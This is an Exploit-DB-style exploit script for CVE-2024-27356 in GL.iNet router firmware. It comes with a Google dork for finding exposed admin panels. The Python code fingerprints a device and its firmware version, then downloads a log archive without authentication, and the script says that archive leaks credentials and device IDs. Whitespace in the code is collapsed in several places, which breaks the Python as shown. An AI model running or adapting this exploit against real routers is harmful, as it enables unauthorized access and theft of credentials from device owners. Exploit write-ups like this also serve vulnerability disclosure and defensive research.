# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download# CVE: CVE-2024-27356# Google Dork: intitle:"GL.iNet Admin Panel"# Date: 2/26/2024# Exploit Author: Bandar Alharbi (aggressor)# Vendor Homepage: www.gl-inet.com# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin# Tested Model: GL-X3000 Spitz AX# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.mdimport sys
import requests
import json
requests.packages.urllib3.disable_warnings()
h ={'Content-type':'application/json;charset=utf-8','User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}defDoesTarExist():
r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)if r.status_code ==200:
f =open("logread.tar","wb")
f.write(r.content)
f.close()print("[*] Full logs archive `logread.tar` has been downloaded!")print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")returnTrueelse:print("[*] The `logread.tar` archive does not exist however ... try again later!")returnFalsedefisVulnerable():
r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)if r1.status_code ==500and"nginx"in r1.text:
r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
if"Admin-Token"in r2.text:
j={"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
ver = r3.json()['result']['firmware_version']
model = r3.json()['result']['model']if ver.startswith(('4.')):print("[*] Firmware version (%s) is vulnerable!"%ver)print("[*] Device model is: %s"%model)returnTrueprint("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")returnFalsedefisAlive():try:
r = requests.get(url, verify=False, timeout=30, headers=h)if r.status_code !=200:print("[*] Make sure the target's web interface is accessible!")returnFalseelif r.status_code ==200:print("[*] The target is reachable!")returnTrueexcept Exception:print("[*] Error occurred when connecting to the target!")passreturnFalseif __name__ =='__main__':iflen(sys.argv)!=2:print("exploit.py url")
sys.exit(0)
url = sys.argv[1]
url = url.lower()ifnot url.startswith(('http://','https://')):print("[*] Invalid url format! It should be http[s]://<domain or ip>")
sys.exit(0)if url.endswith("/"):
url = url.rstrip("/")print("[*] GL.iNet Unauthenticated Full Logs Downloader")try:if(isAlive()and isVulnerable())==(TrueandTrue):
DoesTarExist()except KeyboardInterrupt:print("[*] The exploit has been stopped by the user!")
sys.exit(0)